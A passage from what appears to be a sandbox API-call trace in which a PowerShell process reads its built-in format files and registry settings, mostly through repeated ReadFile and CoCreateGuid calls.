	[0662.641] VirtualQuery (in: lpAddress=0x10c130, lpBuffer=0x10cff0, dwLength=0x30 | out: lpBuffer=0x10cff0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0662.642] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x95694f54, Data2=0xba48, Data3=0x402a, Data4=([0]=0x84, [1]=0x5a, [2]=0x63, [3]=0xda, [4]=0x31, [5]=0x8, [6]=0x68, [7]=0x38))) returned 0x0
	[0664.346] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xd3b672d7, Data2=0x5ce8, Data3=0x4ea6, Data4=([0]=0x95, [1]=0x72, [2]=0x5b, [3]=0x3e, [4]=0x7e, [5]=0x2c, [6]=0x3d, [7]=0x0))) returned 0x0
	[0664.347] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xfd554ed7, Data2=0xeeeb, Data3=0x4a41, Data4=([0]=0xb1, [1]=0xd9, [2]=0x61, [3]=0x72, [4]=0x11, [5]=0x39, [6]=0xcc, [7]=0x37))) returned 0x0
	[0664.347] VirtualQuery (in: lpAddress=0x10b9f0, lpBuffer=0x10c8b0, dwLength=0x30 | out: lpBuffer=0x10c8b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0664.348] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x655133d5, Data2=0xfda3, Data3=0x4086, Data4=([0]=0x9b, [1]=0xaf, [2]=0x5f, [3]=0x66, [4]=0x85, [5]=0xd1, [6]=0x18, [7]=0x37))) returned 0x0
	[0664.348] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x4daf2d2e, Data2=0xdbdc, Data3=0x48ca, Data4=([0]=0x99, [1]=0xa5, [2]=0xa7, [3]=0xb8, [4]=0x1e, [5]=0x2d, [6]=0x5e, [7]=0xd0))) returned 0x0
	[0664.349] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0664.349] GetFileType (hFile=0x31c) returned 0x1
	[0664.349] SetErrorMode (uMode=0x1) returned 0x1
	[0664.349] GetFileType (hFile=0x31c) returned 0x1
	[0664.349] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.349] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.349] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.350] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.350] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.350] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.350] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.350] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.351] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.351] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.352] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.352] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.352] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.352] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.352] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.352] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.354] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.355] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0xbce, lpOverlapped=0x0) returned 1
	[0664.355] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8556, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8556*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0664.355] ReadFile (in: hFile=0x31c, lpBuffer=0x30b8e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x30b8e20*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0664.355] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d4e8 | out: phkResult=0x10d4e8*=0x31c) returned 0x0
	[0664.355] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d46c, lpData=0x0, lpcbData=0x10d468*=0x0 | out: lpType=0x10d46c*=0x1, lpData=0x0, lpcbData=0x10d468*=0x56) returned 0x0
	[0664.355] CoTaskMemAlloc (cb=0x5a) returned 0x1b3114a0
	[0664.355] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d43c, lpData=0x1b3114a0, lpcbData=0x10d438*=0x56 | out: lpType=0x10d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d438*=0x56) returned 0x0
	[0664.356] CoTaskMemFree (pv=0x1b3114a0) 
	[0664.356] RegCloseKey (hKey=0x31c) returned 0x0
	[0664.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0664.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0664.357] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xd3add20d, Data2=0x772c, Data3=0x450b, Data4=([0]=0xbb, [1]=0xc9, [2]=0x24, [3]=0xe8, [4]=0xfc, [5]=0x9f, [6]=0x4e, [7]=0x30))) returned 0x0
	[0664.357] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xc84d9369, Data2=0xcd4f, Data3=0x4793, Data4=([0]=0xb2, [1]=0xbd, [2]=0x45, [3]=0xf5, [4]=0xda, [5]=0x66, [6]=0xe9, [7]=0x4d))) returned 0x0
	[0664.358] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xb6899e77, Data2=0x1f09, Data3=0x4b65, Data4=([0]=0xa0, [1]=0x4b, [2]=0xad, [3]=0xe1, [4]=0x85, [5]=0x5e, [6]=0x3c, [7]=0x5c))) returned 0x0
	[0664.358] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xabb83ca8, Data2=0x3cdb, Data3=0x4d19, Data4=([0]=0x90, [1]=0x59, [2]=0x56, [3]=0xae, [4]=0x9c, [5]=0xc3, [6]=0xce, [7]=0xe7))) returned 0x0
	[0664.358] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xd5112d5d, Data2=0x4928, Data3=0x49f9, Data4=([0]=0x8b, [1]=0xbb, [2]=0x7e, [3]=0x93, [4]=0x34, [5]=0x88, [6]=0x45, [7]=0x80))) returned 0x0
	[0664.358] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x73e502d9, Data2=0xf908, Data3=0x4b05, Data4=([0]=0xb8, [1]=0x80, [2]=0xf8, [3]=0x7e, [4]=0x9e, [5]=0xaf, [6]=0xda, [7]=0xfc))) returned 0x0
	[0664.358] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xd7257ae4, Data2=0x322, Data3=0x4a70, Data4=([0]=0xb4, [1]=0x60, [2]=0xc2, [3]=0x90, [4]=0x2b, [5]=0xae, [6]=0x86, [7]=0x77))) returned 0x0
	[0664.359] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x4127152e, Data2=0xa8bc, Data3=0x41e8, Data4=([0]=0x9a, [1]=0x83, [2]=0x63, [3]=0xf3, [4]=0x89, [5]=0xa7, [6]=0x16, [7]=0x28))) returned 0x0
	[0664.359] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x73d689ad, Data2=0x701, Data3=0x40b7, Data4=([0]=0x8e, [1]=0x48, [2]=0x23, [3]=0xc3, [4]=0x73, [5]=0x94, [6]=0xf3, [7]=0x36))) returned 0x0
	[0664.359] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x908d57b3, Data2=0x76e1, Data3=0x4b86, Data4=([0]=0x82, [1]=0x6e, [2]=0x71, [3]=0x3d, [4]=0x9d, [5]=0xe9, [6]=0xc4, [7]=0xda))) returned 0x0
	[0664.359] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x4425b605, Data2=0xd43c, Data3=0x48d7, Data4=([0]=0xbf, [1]=0x32, [2]=0x36, [3]=0x69, [4]=0xa8, [5]=0x95, [6]=0x2d, [7]=0x57))) returned 0x0
	[0664.359] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x506c838c, Data2=0xdf17, Data3=0x4515, Data4=([0]=0xae, [1]=0x95, [2]=0x3e, [3]=0x6f, [4]=0x42, [5]=0xfb, [6]=0xd4, [7]=0xb1))) returned 0x0
	[0664.360] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xbda09892, Data2=0xf6b2, Data3=0x4f90, Data4=([0]=0xa9, [1]=0xc5, [2]=0x30, [3]=0xde, [4]=0xf7, [5]=0x9, [6]=0x29, [7]=0x8b))) returned 0x0
	[0664.360] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xb898866e, Data2=0x74b8, Data3=0x4fca, Data4=([0]=0x99, [1]=0xd6, [2]=0x4c, [3]=0xf4, [4]=0x50, [5]=0x43, [6]=0xb4, [7]=0xc3))) returned 0x0
	[0664.360] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xf78922be, Data2=0x607f, Data3=0x43fa, Data4=([0]=0x95, [1]=0x79, [2]=0x8, [3]=0xa, [4]=0xc1, [5]=0x57, [6]=0x47, [7]=0x8e))) returned 0x0
	[0664.360] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x47901e15, Data2=0xa962, Data3=0x4c96, Data4=([0]=0x8a, [1]=0x28, [2]=0x92, [3]=0x2c, [4]=0xe2, [5]=0xce, [6]=0x8e, [7]=0x8c))) returned 0x0
	[0664.361] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xd661be42, Data2=0x6093, Data3=0x4352, Data4=([0]=0xb5, [1]=0xc9, [2]=0xb, [3]=0xcf, [4]=0xda, [5]=0xc6, [6]=0xb9, [7]=0x9f))) returned 0x0
	[0664.361] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x9329d32d, Data2=0x5628, Data3=0x43cc, Data4=([0]=0x8d, [1]=0x4c, [2]=0x35, [3]=0x47, [4]=0xd, [5]=0xe5, [6]=0xe0, [7]=0x33))) returned 0x0
	[0664.361] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x179372a4, Data2=0xfad2, Data3=0x46fd, Data4=([0]=0x82, [1]=0x92, [2]=0x16, [3]=0x1c, [4]=0x43, [5]=0x8d, [6]=0x9e, [7]=0x3a))) returned 0x0
	[0664.361] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x8db1b928, Data2=0x87f5, Data3=0x402d, Data4=([0]=0x89, [1]=0x32, [2]=0xd1, [3]=0x88, [4]=0x64, [5]=0x73, [6]=0x58, [7]=0x65))) returned 0x0
	[0664.361] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xa36fb52a, Data2=0x35e7, Data3=0x4bbb, Data4=([0]=0xbe, [1]=0xef, [2]=0xf9, [3]=0xf0, [4]=0x40, [5]=0xc6, [6]=0x27, [7]=0xa2))) returned 0x0
	[0664.361] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x76711823, Data2=0x7ba8, Data3=0x4ce8, Data4=([0]=0xbd, [1]=0x4, [2]=0x39, [3]=0x8c, [4]=0xed, [5]=0x25, [6]=0x9c, [7]=0x64))) returned 0x0
	[0664.362] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x21334b63, Data2=0x68f8, Data3=0x4504, Data4=([0]=0x8e, [1]=0x63, [2]=0xae, [3]=0x62, [4]=0xee, [5]=0xa6, [6]=0x1, [7]=0xb8))) returned 0x0
	[0664.362] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x9b179ae3, Data2=0xf0ef, Data3=0x4c13, Data4=([0]=0xa4, [1]=0xcf, [2]=0xd5, [3]=0x93, [4]=0xb1, [5]=0xc3, [6]=0xb2, [7]=0xc6))) returned 0x0
	[0664.362] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x2504d8d2, Data2=0x193d, Data3=0x4e1b, Data4=([0]=0xb1, [1]=0x36, [2]=0xc7, [3]=0xec, [4]=0x8c, [5]=0x40, [6]=0x23, [7]=0x97))) returned 0x0
	[0664.362] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xa0aff233, Data2=0xc654, Data3=0x427e, Data4=([0]=0xac, [1]=0xbb, [2]=0xe2, [3]=0x8b, [4]=0x15, [5]=0xd4, [6]=0xd9, [7]=0x29))) returned 0x0
	[0664.362] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xc25a048b, Data2=0xaee8, Data3=0x4854, Data4=([0]=0xa8, [1]=0xeb, [2]=0x77, [3]=0x7, [4]=0xdd, [5]=0xaf, [6]=0xf1, [7]=0xd1))) returned 0x0
	[0664.363] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x7192fba9, Data2=0x1ea3, Data3=0x48a4, Data4=([0]=0xb8, [1]=0x65, [2]=0x8f, [3]=0x10, [4]=0xfc, [5]=0x7e, [6]=0x8a, [7]=0x75))) returned 0x0
	[0664.363] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x80a56130, Data2=0xe6ee, Data3=0x4b59, Data4=([0]=0xa8, [1]=0x47, [2]=0x6b, [3]=0xd0, [4]=0x37, [5]=0x4c, [6]=0x56, [7]=0x68))) returned 0x0
	[0664.363] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x8902fd6d, Data2=0xb391, Data3=0x4a74, Data4=([0]=0xae, [1]=0xef, [2]=0xd4, [3]=0x99, [4]=0xd1, [5]=0x65, [6]=0x18, [7]=0x18))) returned 0x0
	[0664.363] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x65c64e7c, Data2=0x108f, Data3=0x4af5, Data4=([0]=0xb5, [1]=0xad, [2]=0x80, [3]=0x47, [4]=0x7b, [5]=0x86, [6]=0x3a, [7]=0xf))) returned 0x0
	[0664.363] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xb3476c9a, Data2=0x222f, Data3=0x4c6c, Data4=([0]=0x88, [1]=0xb5, [2]=0xaf, [3]=0x9, [4]=0x55, [5]=0x26, [6]=0x92, [7]=0x54))) returned 0x0
	[0664.363] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x138d049c, Data2=0x6c5, Data3=0x4da6, Data4=([0]=0xac, [1]=0xc0, [2]=0xd6, [3]=0x70, [4]=0x45, [5]=0x61, [6]=0x95, [7]=0x2e))) returned 0x0
	[0664.364] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x2d5b0bf0, Data2=0x297e, Data3=0x4437, Data4=([0]=0x9f, [1]=0xb3, [2]=0xee, [3]=0x9, [4]=0xdc, [5]=0x6f, [6]=0xd, [7]=0x20))) returned 0x0
	[0664.364] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xb5416d16, Data2=0x3ec, Data3=0x499b, Data4=([0]=0xa1, [1]=0x6a, [2]=0x14, [3]=0x4f, [4]=0x46, [5]=0x96, [6]=0x7, [7]=0x2))) returned 0x0
	[0664.364] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x9e50052, Data2=0x2c10, Data3=0x4b8e, Data4=([0]=0xbf, [1]=0x92, [2]=0x9c, [3]=0xac, [4]=0x14, [5]=0xfe, [6]=0x5b, [7]=0x86))) returned 0x0
	[0664.365] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x28da6aa4, Data2=0x656c, Data3=0x4457, Data4=([0]=0xa8, [1]=0xf0, [2]=0x5d, [3]=0xfc, [4]=0xc3, [5]=0xd0, [6]=0x71, [7]=0x35))) returned 0x0
	[0664.365] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0664.365] GetFileType (hFile=0x31c) returned 0x1
	[0664.365] SetErrorMode (uMode=0x1) returned 0x1
	[0664.365] GetFileType (hFile=0x31c) returned 0x1
	[0664.365] ReadFile (in: hFile=0x31c, lpBuffer=0x31c95b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31c95b8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.366] ReadFile (in: hFile=0x31c, lpBuffer=0x31c95b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31c95b8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.366] ReadFile (in: hFile=0x31c, lpBuffer=0x31c95b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31c95b8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.366] ReadFile (in: hFile=0x31c, lpBuffer=0x31c95b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31c95b8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.366] ReadFile (in: hFile=0x31c, lpBuffer=0x31c95b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31c95b8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.366] ReadFile (in: hFile=0x31c, lpBuffer=0x31c95b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31c95b8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.366] ReadFile (in: hFile=0x31c, lpBuffer=0x31c95b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31c95b8*, lpNumberOfBytesRead=0x10d458*=0x119, lpOverlapped=0x0) returned 1
	[0664.367] ReadFile (in: hFile=0x31c, lpBuffer=0x31c95b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31c95b8*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0664.367] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d4e8 | out: phkResult=0x10d4e8*=0x31c) returned 0x0
	[0664.367] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d46c, lpData=0x0, lpcbData=0x10d468*=0x0 | out: lpType=0x10d46c*=0x1, lpData=0x0, lpcbData=0x10d468*=0x56) returned 0x0
	[0664.367] CoTaskMemAlloc (cb=0x5a) returned 0x1b3114a0
	[0664.367] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d43c, lpData=0x1b3114a0, lpcbData=0x10d438*=0x56 | out: lpType=0x10d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d438*=0x56) returned 0x0
	[0664.367] CoTaskMemFree (pv=0x1b3114a0) 
	[0664.367] RegCloseKey (hKey=0x31c) returned 0x0
	[0664.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0664.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0664.368] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xa786e2a6, Data2=0x19d6, Data3=0x4803, Data4=([0]=0x96, [1]=0xdc, [2]=0xf9, [3]=0xa7, [4]=0xea, [5]=0x72, [6]=0x8e, [7]=0xbb))) returned 0x0
	[0664.369] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xba71af10, Data2=0x3af2, Data3=0x43ea, Data4=([0]=0xad, [1]=0x85, [2]=0x62, [3]=0xf9, [4]=0xd7, [5]=0x76, [6]=0x1a, [7]=0x50))) returned 0x0
	[0664.369] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x3bbfd33d, Data2=0xa5c5, Data3=0x4eb4, Data4=([0]=0xbe, [1]=0x24, [2]=0x8f, [3]=0x3d, [4]=0x5f, [5]=0x33, [6]=0xa7, [7]=0xdc))) returned 0x0
	[0664.369] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x3e876e97, Data2=0xb61c, Data3=0x4fa7, Data4=([0]=0xae, [1]=0xe8, [2]=0xc7, [3]=0x6, [4]=0x1d, [5]=0x9d, [6]=0x59, [7]=0xe6))) returned 0x0
	[0664.369] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0664.369] GetFileType (hFile=0x31c) returned 0x1
	[0664.370] SetErrorMode (uMode=0x1) returned 0x1
	[0664.370] GetFileType (hFile=0x31c) returned 0x1
	[0664.370] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.370] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.371] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.371] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0664.372] ReadFile (in: hFile=0x31c, lpBuffer=0x3225758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3225758*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
